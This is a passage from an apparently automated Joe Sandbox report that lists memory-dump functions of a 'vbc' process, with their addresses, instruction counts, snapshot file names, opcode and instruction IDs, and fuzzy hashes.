                                                      • Opcode Fuzzy Hash: 08a5888f5ad36f6e674665bbc0b831318ef06d97c5faad1c7d8542d695d260f5
                                                      • Instruction Fuzzy Hash: 79F0B87161B6989BC722DA58C148B21B7EDAB056A4F09E63EDC0AC7522CA70CC80CE51
                                                      Function 05852619 Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                      • Instruction ID: 2b45a1217d22457ccfc16b3d8fc949b71b9a176bbe955151b1995dde622ce58e
                                                      • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                      • Instruction Fuzzy Hash: E1E092323406006BDB219E5D8C84F5777AEAF82B20F440479BD059E251CAE29C0982A5
                                                      Function 058E539D Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3d0f62041eaf5410a223b901df88d281ee787c78378b9e140b88feb9e78ccfe9
                                                      • Instruction ID: ae4a741b7f5cd3712e68e224ce42f8ffe783ca15a7e14cb24c3b64ba7db0c0e9
                                                      • Opcode Fuzzy Hash: 3d0f62041eaf5410a223b901df88d281ee787c78378b9e140b88feb9e78ccfe9
                                                      • Instruction Fuzzy Hash: 8CF05E70A1434CAFDB04EFB9E555AAEB7B4EF48304F508459E902EB291EA78DD018B15
                                                      Function 058E54DB Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a4fffe6f6ab94a3d36222671a437e924942f972c15017d73016d9583f85ae5a
                                                      • Instruction ID: cd9c0e16d64898220a911def2a6ce73e80236ff4481d806d4323f631e651d284
                                                      • Opcode Fuzzy Hash: 8a4fffe6f6ab94a3d36222671a437e924942f972c15017d73016d9583f85ae5a
                                                      • Instruction Fuzzy Hash: 4AF08270A10348ABDB04EBA9D55AE9E7BB5EF08308F500459A901EB281EA34DD418715
                                                      Function 058E547F Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8b85861859ddf11f2d212116aade2c2bfb0a725b15b9852f5e2c5c16eac34cd4
                                                      • Instruction ID: 97ae16098fd978ec73e56f619dae21223efd29e19b95aaffb7fca0fadac13d3d
                                                      • Opcode Fuzzy Hash: 8b85861859ddf11f2d212116aade2c2bfb0a725b15b9852f5e2c5c16eac34cd4
                                                      • Instruction Fuzzy Hash: 32F08270B11348ABDB04DBA9D55AE9E77B4EF08308F500455E901EB381EE38DD408755
                                                      Function 058CF72E Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 339b278bc0d9b421a9c7a050aa1d2ae95477fe2d02a238d02c675e6c5f3f365f
                                                      • Instruction ID: 61744a1da08a78f3cb8e424f40df24eae91c197575e2048ca012b720e0851b9e
                                                      • Opcode Fuzzy Hash: 339b278bc0d9b421a9c7a050aa1d2ae95477fe2d02a238d02c675e6c5f3f365f
                                                      • Instruction Fuzzy Hash: AAF08271A11348ABDF04DBA9D55AE9E7BB4EF08704F400499EA02EB281ED74DD418715
                                                      Function 058E51CB Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9568f62a60a3efb6b9eb0379b4225aef86503be740d152c39b8f79fcd99e2162
                                                      • Instruction ID: 44244afa66a1119c0cdfa479b7c1cdc3fae7e70c3494266735cf13b1628615f7
                                                      • Opcode Fuzzy Hash: 9568f62a60a3efb6b9eb0379b4225aef86503be740d152c39b8f79fcd99e2162
                                                      • Instruction Fuzzy Hash: BFF058B0A15348ABDB04EBA8D91AE6EB7B8AB04208F540459AD01EB291EA74ED008759
                                                      Function 058455C0 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                      • Instruction ID: 9a38edec11c532c9430550da8b08becb31d6626e017a9eeb8f5fefad7d28cef6
                                                      • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                      • Instruction Fuzzy Hash: 58E0E533104618ABC2215A0ADC04F2ABB6AFF50BB0F118515AC59975908B64BC11CAD4
                                                      Function 05810710 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                      • Instruction ID: d7f7621046d9abfd1f11f7909e537a63ee8306e7aceb4a244e5706d138a817a8
                                                      • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                      • Instruction Fuzzy Hash: F5F0A039204344DBDB15DF19C458AA57BA9EB41350B004895EC42CB301DA36EDC2CB45
                                                      Function 058E37B6 Relevance: .0, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                      • Instruction ID: 92e74d32cc07f63203ab66b9a3a369a048863d70f8badf0bc6a5a0a8b7ffe22c
                                                      • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                      • Instruction Fuzzy Hash: B8E06D72214214ABD764DB58CD05FA673ACFB05720F540668B916D30D0DEB0BE40CA60
                                                      Function 058125E0 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 196b6fff65649d44a591262208b0c3112206a39eefbe88cbb786e3ddad8392ab
                                                      • Instruction ID: f6d0bf797d8cb5d2b22b086d102f8f29e9ac0de4be13547b1daffc8e48076128
                                                      • Opcode Fuzzy Hash: 196b6fff65649d44a591262208b0c3112206a39eefbe88cbb786e3ddad8392ab
                                                      • Instruction Fuzzy Hash: 0FE092322006549BC711BF2DDD15F8A7B9AEF54370F114515B91A971A0CF34AC50C7C9
                                                      Function 058CB3D0 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                      • Instruction ID: b098011eabfc2ed2d03a1ffbf8313276fbb02c63f975d88f1f495de7990a6c92
                                                      • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                      • Instruction Fuzzy Hash: CAE02C31284618ABCB222E04CC00F69BB16AB407A2F204031BE08AA690CA70EC91D6C0
                                                      Function 05812050 Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0bc6a4b83b2d95f2ff809a3341ffc7dcf0f9c86f3ad66c3316d7d861df17e064
                                                      • Instruction ID: 412e77f58ec47cdfd3e794360759491dfb218698b16dfcde49688208a965d654
                                                      • Opcode Fuzzy Hash: 0bc6a4b83b2d95f2ff809a3341ffc7dcf0f9c86f3ad66c3316d7d861df17e064
                                                      • Instruction Fuzzy Hash: 9FE08C322006606BC611FA5DDD11F4A7B9EEF94360F100121B955872A0CB24AC40C799
                                                      Function 0580B562 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                      • Instruction ID: 9d794bf557907196f474eb6f276d5ee6f03219524d32fce0119e6d52c846748b
                                                      • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                      • Instruction Fuzzy Hash: 5ED05B31261760AFD7316F19ED09F467A75AF80B11F0505547405964F08565DD84C691
                                                      Function 0584E59C Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                      • Instruction ID: 8e9212e857744a7406cdd178042c97b552287b32629b3981edc30267b6430909
                                                      • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                      • Instruction Fuzzy Hash: A9D0C932654660ABD772AA1CFC04FE377E9BB88761F160859F419C7150C765AC81CA84
                                                      Function 0580A0E3 Relevance: .0, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                      • Instruction ID: 391139b7521d75dd7dc00212b7e9fb22f77ea5df2a202d9d854fdd8b6926539c
                                                      • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                      • Instruction Fuzzy Hash: 45D02232316130A3CB2CAA546C14F636A06AB80AA4F1A002C3C0BD3840C4088C82C2E0
                                                      Function 0584C700 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                      • Instruction ID: e1acdb130c8e781bee9a110ba0ef2464d9e4ae6cf04a897c93b6d9c48cbfef53
                                                      • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                      • Instruction Fuzzy Hash: CBC01232290648AFC712AE98CD01F027BA9EB98B50F100421F6088B670CA35EC60EA84
                                                      Function 0583340D Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                      • Instruction ID: dd7aec2bd86388ef567705befb7f61a07caa3f83d6e3654e81e779417c4d88e7
                                                      • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                      • Instruction Fuzzy Hash: 6BC08C702416806AEB2B5B00C916F3C3A50BB14617F94099CAE45F94A1CB6C9C02C258
                                                      Function 05810750 Relevance: .0, Instructions: 9COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                      • Instruction ID: a62080b06527b227d03eed1c93e9e848584afdf57240f00630d2316116307e2e
                                                      • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                      • Instruction Fuzzy Hash: 34C04C797116418FCF15DB19D2A4F5577E4F744740F150890EC05DB721E628EC41CA11
                                                      Function 05854650 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 929ea90efabf919009c173f448841a1626f93e74e405b919edd0e9b467423df2
                                                      • Instruction ID: 7b4eaf86df75f2be47b69cb272161667ead961a06d23ee51f5be06411fe02337
                                                      • Opcode Fuzzy Hash: 929ea90efabf919009c173f448841a1626f93e74e405b919edd0e9b467423df2
                                                      • Instruction Fuzzy Hash: C79002A670150046424071584844506605597E13023D5C115A9598560C86188D59966A
                                                      Function 05853090 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 53e096d6e9137b156db99f589255b2b32f3b03bbb54e977c5f4dc083a66b2a51
                                                      • Instruction ID: 2a7134094aa9b3fc5e1c7a5a4b6ba34627c94b476668d3867cf84a9ca9cb05ae
                                                      • Opcode Fuzzy Hash: 53e096d6e9137b156db99f589255b2b32f3b03bbb54e977c5f4dc083a66b2a51
                                                      • Instruction Fuzzy Hash: 4290026634140806D240715884547070056C7D0602F95C011A9068554D86168E696AB2
                                                      Function 05853010 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 82c33bda8fb1d8575d94833a57ea5812ca312382206473234884ac2567e62dcf
                                                      • Instruction ID: db0272eed915837f903b0c50b7be4ea69553e521eebeec69a55d9700593adc8d
                                                      • Opcode Fuzzy Hash: 82c33bda8fb1d8575d94833a57ea5812ca312382206473234884ac2567e62dcf
                                                      • Instruction Fuzzy Hash: EA90026630184446D24072584844B0F415587E1203FD5C019AD19A554CC9158D595B22
                                                      Function 05854340 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62329dccd6d00323aaca321d365b67d5acb902937c8571299b66c679995e6ab0
                                                      • Instruction ID: bb849b70140e72ec5223e7fef1ec0bdddd8b64c525181966faf9bf510bbc0c3b
                                                      • Opcode Fuzzy Hash: 62329dccd6d00323aaca321d365b67d5acb902937c8571299b66c679995e6ab0
                                                      • Instruction Fuzzy Hash: DE900276705800169240715848C4646405597E0302B95C011E9468554C8A148E5A5762
                                                      Function 05852DB0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5cf9a39c489706c8939dc94499c738f8a207dd7def7e1ca196e5d750b68697a7
                                                      • Instruction ID: d56d1c224f0b43786b114c3969b32462a513367cea84ea0dc88a47b752c4141e
                                                      • Opcode Fuzzy Hash: 5cf9a39c489706c8939dc94499c738f8a207dd7def7e1ca196e5d750b68697a7
                                                      • Instruction Fuzzy Hash: 2390027634140406D24171584444706005997D0242FD5C012A9468554E86558F5AAE62
                                                      Function 05852DD0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15b1e8e5ff4b042fea8b3c6ed383236315f541b31a7fcb7de787e6c9c79b9c1c
                                                      • Instruction ID: 8521b3a0066373c18bcd280e6c6da01bbde550280cb5444d808b578d5c0d5d76
                                                      • Opcode Fuzzy Hash: 15b1e8e5ff4b042fea8b3c6ed383236315f541b31a7fcb7de787e6c9c79b9c1c
                                                      • Instruction Fuzzy Hash: B7900266342441565645B1584444607405697E02427D5C012AA458950C85269D5ADA22
                                                      Function 05852D00 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b198bffdcea765277827c7743d6223f3dd1900fc162136c944b71fa9c7fe0d23
                                                      • Instruction ID: bc2075205317606ab038f32142cbdd2efc07e0f6667bd4fad6c09b652f4f9cff
                                                      • Opcode Fuzzy Hash: b198bffdcea765277827c7743d6223f3dd1900fc162136c944b71fa9c7fe0d23
                                                      • Instruction Fuzzy Hash: 5A90026630544446D20075585448B06005587D0206F95D011AA0A8595DC6358D55A532
                                                      Function 05852D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ec14b6a2f1610bf07cdc91a779fcb3fd9068e2c07b655e6a301baca9a9632719
                                                      • Instruction ID: d60681625e71126b07fe7c78ac9db9304ee7d6b0955cae087ea173bc34663dac
                                                      • Opcode Fuzzy Hash: ec14b6a2f1610bf07cdc91a779fcb3fd9068e2c07b655e6a301baca9a9632719
                                                      • Instruction Fuzzy Hash: C490026E31340006D2807158544870A005587D1203FD5D415A9059558CC9158D6D5722
                                                      Function 05853D10 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ad0c3bda36e5ac68de0a02dd3968a0d4655d120acc9e2e7f26541c9fb7006f2
                                                      • Instruction ID: 7fa6282d5f66a37f07718728309a65517167b9806d4b7e6b164dd87ef5153721
                                                      • Opcode Fuzzy Hash: 9ad0c3bda36e5ac68de0a02dd3968a0d4655d120acc9e2e7f26541c9fb7006f2
                                                      • Instruction Fuzzy Hash: AA90027630240146964072585844B4E415587E1303BD5D415A9059554CC9148D655622
                                                      Function 05852D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a7bb965d817288e0a4c85e6f514d713400f8328b2a299c3076088e3287ca6adb
                                                      • Instruction ID: a70a9f8e8b8d7397386a302e20fc78c87d6cd42812e01bcc42bead1e9534dc5f
                                                      • Opcode Fuzzy Hash: a7bb965d817288e0a4c85e6f514d713400f8328b2a299c3076088e3287ca6adb
                                                      • Instruction Fuzzy Hash: 1490026630140007D240715854587064055D7E1302F95D011E9458554CD9158D5A5623
                                                      Function 05853D70 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a8990e38dee1a3776b54e16257f47b6c3b987077ea062f3e0b1b031153a3d029
                                                      • Instruction ID: d58d3b15c660f9681a2273f1758b05593a33c02c6d71ef1b6fb63433031b0a30
                                                      • Opcode Fuzzy Hash: a8990e38dee1a3776b54e16257f47b6c3b987077ea062f3e0b1b031153a3d029
                                                      • Instruction Fuzzy Hash: CE90027A30140406D61071585844746009687D0302F95D411A9468558D86548DA5A522
                                                      Function 05852CA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b3064ceeafb95847877d4a702d21d6503d18eb37ab9a032dde0912846e43f80b
                                                      • Instruction ID: 174927f3a0407210172700aad0d949b0e2d76f35a39c9b14ea173fe00b88da9b
                                                      • Opcode Fuzzy Hash: b3064ceeafb95847877d4a702d21d6503d18eb37ab9a032dde0912846e43f80b
                                                      • Instruction Fuzzy Hash: E190027630140406D20075985448746005587E0302F95D011AE068555EC6658D956532
                                                      Function 05852CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7a9b03454d91a6f48ed2ec446114b62d909569a1fa7291a48d212f57c79b6836
                                                      • Instruction ID: 24f2a099677d8ac54ac06763c4beb5af1488458dd8832c6465934fdb47716000
                                                      • Opcode Fuzzy Hash: 7a9b03454d91a6f48ed2ec446114b62d909569a1fa7291a48d212f57c79b6836
                                                      • Instruction Fuzzy Hash: DF90026670540406D24071585458706006587D0202F95D011A9068554DC6598F596AA2
                                                      Function 05852CF0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d67565556ab7d19ba771dd8728b0b3dc5160f06f0d01eefdcee537ea77bcd94
                                                      • Instruction ID: e5ac980bbf183ac525b2c33f1216b4f71db348860c28427907109cd34311bbe1
                                                      • Opcode Fuzzy Hash: 6d67565556ab7d19ba771dd8728b0b3dc5160f06f0d01eefdcee537ea77bcd94
                                                      • Instruction Fuzzy Hash: 4D90027630140407D20071585548707005587D0202F95D411A9468558DD6568D556522
                                                      Function 05852C60 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
